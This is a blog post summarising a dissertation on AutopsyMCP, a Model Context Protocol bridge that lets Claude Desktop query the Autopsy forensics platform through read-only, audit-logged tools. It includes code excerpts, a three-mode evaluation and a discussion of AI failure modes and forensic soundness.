[{"content":"This post covers the main findings from my undergraduate dissertation. I built and evaluated AutopsyMCP, a natural language interface for the Autopsy digital forensics platform built on Anthropic\u0026rsquo;s Model Context Protocol. I\u0026rsquo;ll cover what it does, what worked, what failed, and what the results mean for anyone thinking about AI in forensic or security workflows.\nThe Problem Digital forensic investigations are cognitively expensive. Not just technically hard — cognitively hard, in a specific way that the tooling does little to alleviate.\nHere\u0026rsquo;s a realistic example. An investigator suspects a user downloaded confidential files after visiting a file-sharing site. To answer \u0026ldquo;which files were downloaded within 30 minutes of visiting fileshare.example.com\u0026rdquo;, they have to:\nOpen the Web Artifacts section, find the relevant browser history entries Note the timestamps of visits to the suspicious domain Switch to Recent Documents or navigate the Directory Tree for recently created files Manually compare timestamps across both views Cross-reference in the Timeline module to confirm event ordering Five context switches to answer one question. Each switch is an opportunity to lose track of a finding, and the only record of the process is whatever notes you remembered to take.\nAutopsy is an excellent platform. It parses disk images, recovers deleted files, examines file system artifacts, parses browser history, email, messaging data, and much more. But like most forensic tools it\u0026rsquo;s GUI-centric: you navigate to evidence rather than querying for it. The desire for a more assistant-like interface isn\u0026rsquo;t new. Hibshi et al. documented it as far back as 2011, and Reddy and Faklaris argued in 2024 that the usability problem still warrants serious attention.\nThere\u0026rsquo;s also a scale problem. Police forces and forensic labs report hundreds to thousands of devices awaiting analysis. Casey et al. described traditional comprehensive examination as \u0026ldquo;rapidly untenable\u0026rdquo; in 2009. It hasn\u0026rsquo;t improved.\nThe question this project asks is: can a natural language interface built on the Model Context Protocol make this meaningfully better — and can it do so without compromising the evidence integrity standards forensic work legally requires?\nWhat is MCP? The Model Context Protocol (MCP) is an open standard introduced by Anthropic in November 2024. If you haven\u0026rsquo;t come across it: MCP lets LLMs connect to external tools and data sources through a standardized, composable interface, rather than through one-off bespoke integrations. Think of it as a universal adapter, write a server once and any MCP-compatible client (Claude Desktop, Cline, etc.) can use it.\nAn MCP setup has two sides:\nServer: exposes tools (callable functions), resources (data), and prompts (pre-authored instruction templates) via a well-defined JSON-RPC interface Client: an AI assistant that discovers available tools at runtime and invokes them to fulfill requests Most relevant for forensics: every tool invocation is explicit and can be logged. The model doesn\u0026rsquo;t just \u0026ldquo;know\u0026rdquo; something; it makes a discrete, auditable call to retrieve it.\nHilgert et al. (2025) published the first academic analysis arguing MCP is well-suited to forensic applications because of this architecture. They explicitly called for practical integration with real forensic tools as future work. This project takes that up directly.\nThe Architecture AutopsyMCP consists of two main components: a Java plugin embedded in Autopsy exposes case data through a REST API on localhost:8080, and a Python MCP bridge wraps that API as callable tools and presents them to Claude Desktop.\nAutopsyMCP system architecture\nJava Autopsy Plugin A NetBeans ModuleInstall subclass that starts an HTTP server on localhost:8080 when Autopsy loads, binding 22 read-only REST endpoints to Autopsy\u0026rsquo;s internal SleuthkitCase API.\n@Override public void restored() { startHttpServer(); // binds port 8080, registers all handlers } Most handlers follow the same broad pattern: parse query parameters, read data through Autopsy\u0026rsquo;s case APIs, serialize results to JSON, and return. File metadata, for instance:\nAbstractFile file = skCase.getAbstractFileById(fileId); json.put(\u0026#34;md5\u0026#34;, file.getMd5Hash()); json.put(\u0026#34;sha256\u0026#34;, file.getSha256Hash()); json.put(\u0026#34;mtime\u0026#34;, file.getMtime()); json.put(\u0026#34;path\u0026#34;, file.getUniquePath()); The plugin exposes whatever Autopsy has already computed and doesn\u0026rsquo;t trigger ingest itself. If the relevant ingest modules haven\u0026rsquo;t been run on the case, the corresponding data won\u0026rsquo;t be available to query.\nThe plugin installs as a standard .nbm file through Autopsy\u0026rsquo;s existing plugin manager.\nScreenshot of Autopsy Plugins panel showing AutopsyMCP installed and active\nPython MCP Bridge A single Python file (bridge_mcp_autopsy.py) implementing a FastMCP server. It currently exposes 23 tools and 6 prompt playbooks. These are distinct MCP primitives and each plays a different role in an investigation.\nAll tool calls route through a safe_get() utility that handles connection errors, timeouts, and non-200 responses:\ndef safe_get(endpoint: str, params: dict = None) -\u0026gt; dict: # simplified for brevity url = urljoin(autopsy_server_url, endpoint) try: response = requests.get(url, params=params, timeout=15) return response.json() if response.ok else {\u0026#34;error\u0026#34;: f\u0026#34;HTTP {response.status_code}\u0026#34;} except requests.exceptions.ConnectionError: return {\u0026#34;error\u0026#34;: \u0026#34;Cannot connect to Autopsy server.\u0026#34;} The bridge runs with stdio transport: Claude Desktop spawns it as a child process and exchanges MCP JSON-RPC over stdin/stdout.\nPut together, a single question in Claude Desktop flows through the stack like this:\nRequest flow through the AutopsyMCP stack, from natural language input to tool result.\nTools vs. Prompts Tools: invoked at runtime to retrieve data A tool is a function the model can call during a conversation to get information. Each tool is decorated with @mcp.tool(), has typed parameters, and its docstring becomes the description the model uses to decide when to invoke it:\n@mcp.tool() @audit_tool def get_file_metadata(file_id: int) -\u0026gt; dict: \u0026#34;\u0026#34;\u0026#34; Get detailed metadata for a specific file. Args: file_id: File row id. Returns: Path, size, extension, MIME, MD5/SHA256, MAC times, data source, and related fields. \u0026#34;\u0026#34;\u0026#34; return safe_get(\u0026#34;case/file/metadata\u0026#34;, {\u0026#34;id\u0026#34;: file_id}) When an investigator asks \u0026ldquo;what\u0026rsquo;s the SHA256 of file 4821?\u0026rdquo;, the model reads the available tool descriptions, infers get_file_metadata is the right call, invokes it with file_id=4821, and uses the returned JSON to formulate an answer. The investigator never writes a query or navigates a UI.\nThe full tool set covers five categories:\nCategory Tools Case orientation health_check, get_case_overview, get_data_sources, get_volumes, get_os_accounts File navigation search_files_by_name, get_file_metadata, list_directory, find_directories, count_directory_contents File content get_indexed_text, get_file_hex, get_file_strings, extract_file_to_disk, get_extracted_files Artifacts \u0026amp; tags list_artifacts, get_file_artifacts, get_artifact_types, get_tags Timeline \u0026amp; search get_timeline_minmax, get_timeline_event_types, get_timeline_events, keyword_search Prompts: pre-authored instruction templates injected when selected A prompt is registered with @mcp.prompt() rather than @mcp.tool(). It\u0026rsquo;s not something the model calls at runtime: it\u0026rsquo;s a pre-authored instruction string that appears in Claude Desktop\u0026rsquo;s prompt library and is injected into context before the model begins reasoning when an investigator selects it.\n@mcp.prompt() def find_persistence_mechanisms() -\u0026gt; str: \u0026#34;\u0026#34;\u0026#34;Scheduled tasks, startup items, registry run keys and services.\u0026#34;\u0026#34;\u0026#34; return ( \u0026#34;Use list_artifacts(type=\u0026#39;TSK_INSTALLED_PROG\u0026#39;) to find installed programs. \u0026#34; \u0026#34;Use search_files_by_name() for \u0026#39;Startup\u0026#39; to locate startup folder items, \u0026#34; \u0026#34;and search_files_by_name() for \u0026#39;.job\u0026#39; and \u0026#39;\\\\Tasks\\\\\u0026#39; to find scheduled tasks. \u0026#34; \u0026#34;For each suspicious file call get_file_metadata() and get_file_strings(). \u0026#34; \u0026#34;If extract_file_to_disk() and a registry MCP server are available, locate \u0026#34; \u0026#34;NTUSER.DAT, SOFTWARE, and SYSTEM hives using search_files_by_name(), extract each \u0026#34; \u0026#34;with extract_file_to_disk(), then query Run, RunOnce, Winlogon, and Services keys. \u0026#34; \u0026#34;Otherwise summarize findings from artifacts and startup folder items only. \u0026#34; \u0026#34;Report each mechanism: path, hash, and what it executes.\u0026#34; ) This is Hilgert et al.\u0026rsquo;s prompt specificity level in practice: explicitly prescribing a tool sequence rather than leaving sequencing entirely to the model\u0026rsquo;s discretion.\nWhy not just hardcode the workflow? Hardcoded sequences would guarantee consistent execution but at the cost of adaptive reasoning. An investigator working an unfamiliar case needs the model to follow leads as they emerge, not execute a predetermined script. Prompt-level orchestration is a middle ground: the playbook provides investigative structure and a preferred tool sequence, the model retains the flexibility to adapt when evidence demands it.\nThe six playbooks are organized by investigative goal rather than by tool:\nInvestigation prompt playbooks diagram\nThese six cover the core investigative spine and are enough to demonstrate the pattern, but the library is deliberately extensible: additional playbooks targeting more specific workflows can be added without touching the underlying tool set. Their performance against investigator-written prompts hasn\u0026rsquo;t been tested, though it\u0026rsquo;s a natural direction for future work.\nThe clip below shows the reconstruct_user_activity prompt being invoked from Claude Desktop and executed against an open case. Watch how the model sequences tool calls autonomously without the investigator specifying any of them. The playbook prescribes the investigative goal; the model handles the retrieval chain.\nPlaybook selection demonstration\nMalware hunting demonstration using the find_malware_on_system playbook (skip to ~3:07 to view the output report)\nThe generate_ioc_list playbook targets the reporting phase rather than active investigation. Here\u0026rsquo;s an example output on the Beethomahler image:\nSample output from the generate_ioc_list playbook (part 1 of 2)\nSample output from the generate_ioc_list playbook (part 2 of 2)\nOne idea I\u0026rsquo;m considering for an upcoming release is adding optional parameters to prompts. For example, letting the investigator specify an output format directly when invoking generate_ioc_list rather than describing it in the query.\ngenerate_ioc_list playbook with an optional format parameter\nIn practice this isn\u0026rsquo;t a significant gap since you can just specify your preferred format in the prompt itself and the model will follow it. But surfacing it as a named parameter is more intuitive and makes the capability more discoverable.\nAudit Logging Before covering the evaluation, we need to understand how AutopsyMCP handles the accountability problem. It determines whether this is useful in a legal context, not just a research one.\nEvery tool call is intercepted by an @audit_tool decorator before the result is returned to the model:\ndef audit_tool(fn): @wraps(fn) def wrapper(*args, **kwargs): t0 = time.time() result = fn(*args, **kwargs) duration_ms = round((time.time() - t0) * 1000) _write_audit({ \u0026#34;event\u0026#34;: \u0026#34;tool_call\u0026#34;, \u0026#34;tool\u0026#34;: fn.__name__, \u0026#34;case_name\u0026#34;: _get_current_case_name(), \u0026#34;args\u0026#34;: kwargs, \u0026#34;duration_ms\u0026#34;: duration_ms, **_summarize_response(result if isinstance(result, dict) else {}), }) return result return wrapper Here\u0026rsquo;s what a representative investigative session looks like in the audit log:\n{\u0026#34;event\u0026#34;: \u0026#34;session_start\u0026#34;, \u0026#34;autopsy_server\u0026#34;: \u0026#34;http://127.0.0.1:8080/\u0026#34;, \u0026#34;timestamp\u0026#34;: \u0026#34;2026-03-12T14:02:11.004Z\u0026#34;, \u0026#34;session_id\u0026#34;: \u0026#34;a3f9...\u0026#34;} {\u0026#34;event\u0026#34;: \u0026#34;http_call\u0026#34;, \u0026#34;endpoint\u0026#34;: \u0026#34;case/files/by-name\u0026#34;, \u0026#34;params\u0026#34;: {\u0026#34;query\u0026#34;: \u0026#34;.evtx\u0026#34;, \u0026#34;limit\u0026#34;: 50, \u0026#34;offset\u0026#34;: 0}, \u0026#34;duration_ms\u0026#34;: 41, \u0026#34;timestamp\u0026#34;: \u0026#34;2026-03-12T14:02:14.231Z\u0026#34;, \u0026#34;session_id\u0026#34;: \u0026#34;a3f9...\u0026#34;} {\u0026#34;event\u0026#34;: \u0026#34;tool_call\u0026#34;, \u0026#34;tool\u0026#34;: \u0026#34;search_files_by_name\u0026#34;, \u0026#34;case_name\u0026#34;: \u0026#34;Beethomahler\u0026#34;, \u0026#34;args\u0026#34;: {\u0026#34;query\u0026#34;: \u0026#34;.evtx\u0026#34;, \u0026#34;limit\u0026#34;: 50}, \u0026#34;duration_ms\u0026#34;: 43, \u0026#34;count\u0026#34;: 7, \u0026#34;timestamp\u0026#34;: \u0026#34;2026-03-12T14:02:14.229Z\u0026#34;, \u0026#34;session_id\u0026#34;: \u0026#34;a3f9...\u0026#34;} {\u0026#34;event\u0026#34;: \u0026#34;file_extracted_for_delegation\u0026#34;, \u0026#34;file_id\u0026#34;: 12847, \u0026#34;file_name\u0026#34;: \u0026#34;Security.evtx\u0026#34;, \u0026#34;file_size\u0026#34;: 69632, \u0026#34;extracted_path\u0026#34;: \u0026#34;C:\\\\Users\\\\...\\\\autopsymcp-output\\\\ Beethomahler_12847_Security.evtx\u0026#34;, \u0026#34;timestamp\u0026#34;: \u0026#34;2026-03-12T14:02:19.880Z\u0026#34;, \u0026#34;session_id\u0026#34;: \u0026#34;a3f9...\u0026#34;} Each record carries a UTC timestamp and session UUID, so all events from a session can be correlated. Four event types appear across a session:\nsession_start: establishes the investigative session with a unique ID http_call: records the raw REST request to Autopsy, independently of the tool layer tool_call: records the MCP tool invocation as the model called it — name, arguments, response summary, duration file_extracted_for_delegation: marks the exact point a file leaves AutopsyMCP\u0026rsquo;s audit custody for a specialist server. What the specialist server does with it is outside the bridge\u0026rsquo;s audit scope, but the handoff itself is on record. This addresses the core chain-of-custody requirements to the extent an LLM-assisted workflow can: who accessed the evidence, when, what actions were performed, and under what authority.\nTwo acknowledged limitations: the log doesn\u0026rsquo;t implement cryptographic integrity protection (tamper-evident logging is noted as future work), and it captures actions but not reasoning — the model\u0026rsquo;s inferential steps live in the conversation transcript rather than the audit record. More on why this matters in the forensic soundness section.\nSpecialist Servers and the Delegation Architecture To evaluate what delegation actually adds, the entire project was run in three modes: manual Autopsy (Mode 1), MCP without specialist servers (Mode 2), and MCP with the full specialist stack (Mode 3). Mode is determined by the combination of server declarations in the MCP config, per-tool permission controls in Claude Desktop, and server-level toggles for specialist servers. Understanding how that distinction works mechanically is what the rest of this section covers.\nThe Specialist Servers For certain artifact types that benefit from dedicated parsing, Mode 3 adds four specialist MCP servers alongside the core bridge:\nServer Purpose Source EventWhisper Windows Event Log (.evtx) parsing Open-source, Git submodule regipy Offline registry hive analysis Open-source, Git submodule SQLite MCP Read-only querying of extracted database files Built for this project VirusTotal MCP Hash reputation lookup Built for this project The Delegation Pivot: extract_file_to_disk The primary mechanism connecting the core bridge to file-based specialist servers is extract_file_to_disk. It decodes the Base64 binary response from /case/file/binary, writes the file to %USERPROFILE%\\autopsymcp-output under a caseName_fileId_fileName naming scheme, and returns the extracted local path.\nThat path is then available for specialist servers to consume. The tool\u0026rsquo;s docstring explicitly signals this: \u0026ldquo;the returned path may be passed to another MCP server that can read that path.\u0026rdquo;\nEach specialist server\u0026rsquo;s tools describe the file types they accept. When the model encounters a .evtx in a file listing, the inference — extract it, then pass the path to EventWhisper — follows naturally from the combined tool descriptions. No dispatcher or routing rules are involved. The architecture is what Hilgert et al. call implicit inference constraint: server design guides model behavior through documentation rather than enforcement.\nDelegation flow in Mode 3. The model routes to the appropriate specialist server based on the artifact type being handled, as inferred from tool descriptions. No explicit dispatcher is involved.\nDefining the Three Modes The MCP config for Claude Desktop is at %APPDATA%\\Claude\\claude_desktop_config.json. The full Mode 3 config looks like this:\n{ \u0026#34;mcpServers\u0026#34;: { \u0026#34;autopsy\u0026#34;: { \u0026#34;command\u0026#34;: \u0026#34;python\u0026#34;, \u0026#34;args\u0026#34;: [\u0026#34;bridge_mcp_autopsy.py\u0026#34;, \u0026#34;--autopsy-server\u0026#34;, \u0026#34;http://127.0.0.1:8080/\u0026#34;] }, \u0026#34;eventwhisper\u0026#34;: { \u0026#34;command\u0026#34;: \u0026#34;poetry\u0026#34;, \u0026#34;args\u0026#34;: [\u0026#34;-C\u0026#34;, \u0026#34;mcp_servers\\\\EventWhisper\u0026#34;, \u0026#34;run\u0026#34;, \u0026#34;python\u0026#34;, \u0026#34;-m\u0026#34;, \u0026#34;eventwhisper.mcp.server\u0026#34;], \u0026#34;env\u0026#34;: { \u0026#34;PYTHONIOENCODING\u0026#34;: \u0026#34;utf-8\u0026#34; } }, \u0026#34;regipy\u0026#34;: { \u0026#34;command\u0026#34;: \u0026#34;python\u0026#34;, \u0026#34;args\u0026#34;: [\u0026#34;mcp_servers\\\\regipy\\\\regipy_mcp_server\\\\server.py\u0026#34;, \u0026#34;--hives-dir\u0026#34;, \u0026#34;C:\\\\Users\\\\...\\\\autopsymcp-output\u0026#34;] }, \u0026#34;sqlite\u0026#34;: { \u0026#34;command\u0026#34;: \u0026#34;python\u0026#34;, \u0026#34;args\u0026#34;: [\u0026#34;mcp_servers\\\\sqlite-mcp\\\\server.py\u0026#34;] }, \u0026#34;virustotal\u0026#34;: { \u0026#34;command\u0026#34;: \u0026#34;python\u0026#34;, \u0026#34;args\u0026#34;: [\u0026#34;mcp_servers\\\\virustotal-mcp\\\\server.py\u0026#34;], \u0026#34;env\u0026#34;: { \u0026#34;VT_API_KEY\u0026#34;: \u0026#34;\u0026lt;key\u0026gt;\u0026#34; } } } } Each server is spawned as a child process by Claude Desktop at startup. In Mode 3, Claude Desktop presents the combined tool namespace of all five servers simultaneously and the model sees all tools from all servers and selects among them.\nMode 2 uses the same config but with all delegation pathways closed: extract_file_to_disk and get_extracted_files disabled in Claude Desktop\u0026rsquo;s per-tool permission controls, and specialist servers toggled off at the server level. No delegation occurs even if the servers are declared in the config.\nClaude Desktop Connectors panel showing all five MCP servers registered and the per-tool permission controls for the autopsy server. These per-tool controls govern the file-based extraction pathway; server-level toggles (shown in the next figure) govern the remaining specialist servers.\nServer-level toggles in Claude Desktop control specialist servers independently of the per-tool extraction pathway. In Mode 2, these are toggled off alongside the extraction tools to close all delegation pathways.\nMode is determined by the combination of Claude Desktop tool controls and server declarations in the MCP config file. In Mode 2, all delegation pathways are closed — extraction tools disabled and specialist servers toggled off.\nThis composability is intentional. Investigators who only need the Autopsy integration run Mode 2 with no additional setup. Mode 3 is opt-in per artifact domain, and additional servers covering other artifact types (Windows execution artifacts, for example) can be added without modifying the core bridge.\nEvaluation Design All evaluation used Claude Sonnet 4.6. Tasks were run by a single evaluator (me, also the developer) across three modes:\nMode 1: Manual Autopsy, optionally supplemented by standard forensic tools (Eric Zimmerman\u0026rsquo;s suite, etc.) Mode 2: AutopsyMCP bridge + Claude Desktop, no specialist servers Mode 3: AutopsyMCP + all four specialist servers Micro-benchmark: 10 targeted forensic questions across 5 different forensic images (GregSchardt, Stanley, Norman, IPTheft, Animal), each with a known ground-truth answer, spanning a range of artifact types.\nFull case investigation: 20 questions on the Beethomahler forensic image in CTF format, all answers independently verifiable. Tasks run sequentially within a single investigative session per mode.\nMetrics per task: time to completion, answer given, correctness (correct / partial / incorrect / not found), and investigator actions (manual steps for Mode 1, queries sent for Modes 2 and 3).\nPrompting protocol: each task was presented as a single natural language question with no guidance on which tool or artifact type to use. No follow-up prompts were issued unless the system itself requested clarification, and tasks were terminated where the system was clearly not progressing toward a solution.\nResults Micro-Benchmark Metric Mode 1: Manual Mode 2: MCP Only Mode 3: MCP + Delegation Time Performance Avg time per task 93.7s 118.5s 70.6s Median time per task 50.3s 61.3s 60.0s Slowest task Task 1 · 415.4s Task 3 · 536.3s Task 9 · 219.0s Fastest task Task 6 · 8.3s Task 6 · 9.7s Task 6 · 16.6s Accuracy Correct 10/10 7/10 7/10 Partial 0 1 3 Incorrect / not found 0 2 0 Effort Avg steps / queries per task 3.3 steps 1.0 queries 1.0 queries 10 tasks across 5 forensic images. Bold = best in each row.\nMode 1 achieved perfect accuracy. Mode 3 was fastest on average and produced no outright failures (though 3 partials). Mode 2 had the highest failure rate. Both MCP modes required only 1.0 queries per task on average — a significant reduction from 3.3 manual steps.\nTask 1 (last shutdown time, GregSchardt image) illustrates the delegation benefit most clearly. Manual investigation required locating the SYSTEM hive, interpreting a hexadecimal little-endian timestamp, and downloading an external conversion tool (DCode). Total: 6 minutes 55 seconds, 4 steps.\nMode 3 extracted the hive, loaded it into regipy, and ran the shutdown plugin directly. Total: 64 seconds, 1 query.\nDelegation chain: extract_file_to_disk → regipy → answer\nThe model chains the tool calls across the MCP servers (AutopsyMCP and regipy) without the investigator specifying any of the intermediate steps.\nTask 2 (IP and MAC addresses) showed the opposite of Task 1: delegation failed where simpler retrieval succeeded. Mode 3 got the IP address via regipy\u0026rsquo;s network plugin almost immediately but couldn\u0026rsquo;t extract the MAC address, which is stored as a binary registry value requiring parsing that regipy couldn\u0026rsquo;t do as plain text. Mode 2 got both values from the system event log it had already retrieved during the previous query.\nTask 3 (network cards) was Mode 2\u0026rsquo;s slowest task at nearly 9 minutes. It went down a chain of dead ends: NETLOG.txt, Ethereal preferences files, and Dell Latitude CPi-specific driver searches. Notably, it used its training knowledge about the specific laptop model to guide the investigation, which is both useful (it knew which adapters that model typically had) and a liability (it anchored on those expectations rather than what the evidence actually showed).\nTask 5 (files larger than 50MB) produced the most instructive failure. Mode 2 searched systematically and concluded: \u0026ldquo;No files of 50MB or more were found in the image.\u0026rdquo; Two such files existed. Mode 3 solved it correctly by listing full directory contents and filtering programmatically. More on this failure pattern below.\nTask 6 (sector length of vol3) revealed an interpretation gap. Mode 2 mapped the JSON response\u0026rsquo;s raw volume ID numbering to Autopsy\u0026rsquo;s UI partition numbering — which skips unallocated spaces — and returned an incorrect sector count. Mode 3 correctly identified the allocated partition. In manual mode, the answer was immediately visible as a column in Autopsy\u0026rsquo;s partition listing table. This failure illustrates a broader liability of the knowledge-equalizer effect. The model applied training knowledge about partition numbering rather than reasoning strictly from the data returned — and gave no signal that it was doing so. Kadavath et al. (2022) show that LLMs have latent calibration that correlates with correctness but doesn\u0026rsquo;t reliably surface in generated answers. Knowledge equalization and confident misapplication come from the same mechanism.\nTask 8 (activity years) showed a subtler failure in Mode 3: it used limit=1 in its initial 2014 query just to check whether events existed, then presented those partial results as a complete year-by-year summary. Lazy querying producing plausible-looking but incomplete conclusions. Mode 2 made no such shortcut and got it right.\nFull Case Investigation Metric Mode 1: Manual Mode 2: MCP Only Mode 3: MCP + Delegation Time Total investigation time 21.3 min 19.2 min 21.4 min Accuracy Correct (out of 20) 19 16 15 Partial 0 0 1 Incorrect / not found 1 4 4 Effort Total steps / queries 54 steps 20 queries 20 queries 20 CTF-style questions on the Beethomahler image, run sequentially within a single session per mode.\nThe 63% reduction in investigator interactions (54 steps → 20 queries) held across the full investigation. Mode 2 was fastest overall. Mode 3 matched Mode 2 on accuracy but took slightly longer due to delegation overhead on tasks where the simpler path would have sufficed.\nContext retention was one of the more significant findings. Seven of the twenty questions were answered from information already retrieved during earlier queries, with no additional tool calls needed. Tasks 11, 12, and 13 were all answered from the Chrome download artifact data surfaced during Task 10.\nLater queries resolved from earlier conversation context\nIn manual investigation, previously found evidence has to be actively tracked and re-navigated to. Here it simply persists in context.\nThat said, accumulated context proved fragile in two ways. Session termination — which occurred twice during the full case — discarded everything, forcing full re-establishment of earlier evidence chains from scratch. And prior context doesn\u0026rsquo;t expire: Laban et al. (2025) characterize exactly this pattern — LLMs over-rely on early assumptions in subsequent turns, which is what caused Task 16\u0026rsquo;s GPS failure. Both MCP modes had encountered a geolocated image earlier in the session and anchored on it, rather than searching for additional GPS candidates. The manual investigator succeeded because Autopsy\u0026rsquo;s Geolocation module presented all GPS-tagged files simultaneously, with no prior session context to bias the view.\nA qualitative advantage observed across both MCP modes was the richness of output beyond just the answer. Task 7 returned not just camera make and model but contextual device information about the Nikon D40. Task 9 (micro-benchmark) saw both modes produce categorized evidence summaries with Claude\u0026rsquo;s built-in visualization capability, presenting findings in a way that would take significant manual effort to collate manually.\nSample evidence summary visualization produced by Mode 3 for Task 9 (IPTheft image)\nTask 20 (counting WeTransfer visits in Chrome History, excluding page refreshes) was the clearest delegation win. Mode 1: 8 minutes 38 seconds, involving file extraction, loading into an external SQLite viewer, incremental SQL query construction, and WebKit timestamp conversion. Mode 2: failed entirely (attempted to reconstruct the database from hex dumps, terminated). Mode 3: 1 minute 46 seconds.\nSQLite delegation resolving a task Mode 2 failed entirely (part 1 of 2)\nSQLite delegation resolving a task Mode 2 failed entirely (part 2 of 2)\nThe model decoded Chrome\u0026rsquo;s bitmask-encoded transition types, distinguished typed navigations from page refreshes from email link clicks, and arrived at a forensically defensible count — without the investigator knowing anything about Chrome\u0026rsquo;s internal schema.\nTask 19 (WMP installation error code) was the clearest delegation failure. Mode 2 solved it in 18 seconds by directly searching for setup log files. Mode 3 took 4 minutes 45 seconds and returned the wrong answer, having pursued an extended investigation through EventWhisper and WER crash reports before settling on an error code from a different event entirely.\nSpeculative EventWhisper delegation producing incorrect answer\nThe system explored a plausible but wrong line of inquiry and never fell back to the simpler search that solved the task in 17 seconds in Mode 2.\nWhere It Failed 1. Confident false negatives Task 5\u0026rsquo;s Mode 2 failure wasn\u0026rsquo;t a search that returned nothing. It was a well-reasoned, confidently stated incorrect conclusion. The model scanned root and subdirectory contents, found $BadClus system metadata entries (which are large), correctly identified those as non-user files, and then incorrectly concluded no user files exceeded 50MB. A partial hedge appears at the end of the response, but after a bold confident verdict it reads as an afterthought. And this is one of the more charitable cases — the pattern repeats without even that qualification, conclusions stated as definitive with no acknowledgment of incomplete coverage.\nThis is qualitatively different from a failed search. A failed search is a signal to the investigator to try harder. A confident false negative is a signal to move on — and miss the evidence. Farquhar et al. (2024) call this confabulation; Kalai et al. (2025) attribute it to training incentives that reward committing to a plausible conclusion over expressing incompleteness. No API change eliminates this risk. The failure occurs at the conclusion step, not the retrieval step.\nIncorrect conclusion with partial uncertainty acknowledged\n2. Over-eager delegation and goal persistence Task 19 illustrates what Boddy and Joseph (2025) term goal persistence in the agentic AI safety literature: an agent continuing to pursue a failing approach beyond the point where it\u0026rsquo;s reasonable to do so. The model committed to a delegation-heavy investigation path (EventWhisper → crash reports → WER analysis) and never fell back to the simpler search_files_by_name call that solved the task in Mode 2 in 17 seconds.\nWang et al. (2025) find that agents consistently fail to switch strategies even when a simpler path is available. Stechly, Valmeekam, and Kambhampati (2024) show why: LLMs cannot reliably self-verify that a current approach has failed.\nThere\u0026rsquo;s currently no cost threshold or explicit failure trigger in the architecture. A wrong delegation path can negate the delegation benefit entirely. This is the clearest area where the architecture needs hardening.\nTask 17 (shared VM folders) showed a related but distinct failure: the model repeatedly called get_registry_key against hives that weren\u0026rsquo;t loaded, because it lacked a guard condition checking whether a hive was available before attempting to query it. That one is a correctable implementation gap rather than a structural problem.\n3. Anchoring bias — in both human and AI investigators Task 18 (malware identification) returned the same incorrect answer across all three modes, including manual investigation. Every mode anchored on piccies.exe, the first strongly-evidenced malware candidate, without adequately considering alternatives. The AI didn\u0026rsquo;t introduce a new failure mode here. It replicated an existing human cognitive bias.\nTask 16 (GPS photo identification) showed the same pattern. Prior session context primed both MCP modes to return to the first geolocated image rather than searching for additional candidates. The context retention framing explains why it happened; the anchoring framing explains why the model didn\u0026rsquo;t correct itself once it had the first candidate in hand.\nHuang et al. (2026) show this mirrors human first-candidate lock-in. If you\u0026rsquo;re deploying AI assistance expecting it to be immune to biases present in its training data, that expectation is worth revising.\n4. Session fragility and context window limits Both MCP modes depend on an uninterrupted session to accumulate context, and that dependency has a real reliability cost. Session termination occurred twice during the full case, discarding all accumulated context. Task 14\u0026rsquo;s email evidence chain had to be fully re-established from scratch as a result, adding significant time to a task that should have been trivial given what had already been retrieved earlier in the session. Any operational deployment needs to account for this explicitly, as context is not persisted anywhere and requires manual intervention.\nMitigating this is worth exploring: periodic context summarization, saving intermediate findings to a persistent store, or even a dedicated playbook that formats and snapshots the current investigative context for resumption in a new session. Most of these would benefit from some awareness of context window size to trigger proactively rather than after the fact.\nThe Forensic Soundness Question Throughout this project, there was a recurring tension between forensic soundness and useful investigative assistance.\nForensic evidence has strict requirements. ISO/IEC 27037:2012 defines three core principles:\nAuditability: actions must be independently verifiable Justifiability: actions must be explainable Repeatability: same procedures yield the same conclusions The ACPO Good Practice Guide requires that a record of all actions applied to digital evidence be created and preserved so that an independent third party can examine those processes and reach the same conclusions.\nAutopsyMCP addresses these through:\nRead-only access: no tool can modify the forensic image (ACPO Principle 1) Structured audit logging: every tool invocation recorded with timestamp, arguments, response summary, session ID, written independently of the MCP client (ACPO Principle 2) Repeatability: the audit log records what happened in a session, but cannot guarantee a second run follows the same path (ACPO Principle 3, partially addressed) Because the model\u0026rsquo;s tool selection is non-deterministic, the same query may produce different tool sequences, and different conclusions, across independent runs. Individual tool outputs are reproducible; the reasoning path that selected and sequenced them is not.\nNicholson (2026) demonstrates empirically that even at temperature zero, LLMs can produce distinct outputs across repeated invocations of the same prompt.\nThe deeper issue is that these frameworks were designed around deterministic, human-executed procedures. An LLM reasoning layer doesn\u0026rsquo;t fit that model.\nAudit logging is necessary but not sufficient. Sufficiency would require either deterministic tool selection, which would forfeit the analytical flexibility that makes the system useful, or a formal framework for quantifying reasoning variability — neither of which currently exists. The open question for the field is what forensic soundness should mean when the analytical process is non-deterministic.\nPractical Takeaways If you\u0026rsquo;re a forensic practitioner or incident responder:\nThe 63% effort reduction held consistently across both evaluation sets. The knowledge-equalizer effect is real: registry timestamp parsing, Chrome transition bitmask decoding, SQLite schema interpretation, all handled transparently from a natural language query. For triage, initial case orientation, and structured data retrieval, MCP-assisted investigation performs comparably to manual while requiring dramatically less effort and fewer context switches.\nThe accuracy cost is there too (16/20 vs 19/20). The failure modes cluster predictably: confident false negatives at the conclusion step, anchoring on first-found evidence, over-delegation on tasks where a simpler approach exists. Knowing where the failures concentrate lets you design your workflow around them. Use AI assistance for retrieval and correlation; apply explicit human judgment at the conclusion step; treat confidently-stated negative findings with particular skepticism.\nIf you\u0026rsquo;re thinking about AI tooling for security workflows more broadly:\nThe MCP architectural pattern is a meaningful design choice. Constraining an LLM to operate only through logged, verifiable tool calls changes how reliable and auditable the system is. It can no longer reason freely from training knowledge; it has to retrieve and correlate evidence. The failures that remain after applying this constraint are failures of reasoning, not failures of access. That\u0026rsquo;s a narrower problem to address.\nOn forensic soundness specifically:\nAI in DFIR is happening regardless of whether frameworks have caught up. The more productive question is where existing standards hold and where they need extending. Current standards assume deterministic human procedures; we can see where LLM-assisted workflows diverge, and closing that gap is feasible.\nFuture Work Fallback mechanisms for delegation: cost thresholds or explicit failure triggers to prevent goal persistence on wrong paths Session continuity: context is lost on termination and cannot be recovered; mitigations like a snapshot playbook or periodic summarization are worth exploring Aggregate API endpoints: Autopsy\u0026rsquo;s GUI surfaces a range of views that the current API doesn\u0026rsquo;t yet expose Cryptographic audit log integrity: the current log is functional but not tamper-evident, which is a standard expectation for forensic audit trails Multi-evaluator studies: testing the knowledge-equalizer effect with investigators at varying skill levels. The hypothesis that less experienced practitioners benefit most requires proper evidence with practitioners, not just a single-evaluator study The concurrent independent release of the official Autopsy 4.23.0 MCP integration by the Autopsy development team in April 2026 validates the research direction. The open questions are now about the conditions under which AI-assisted workflows are reliably usable in practice. I hope this work contributes to answering them.\nAppendix: Full Evaluation Results 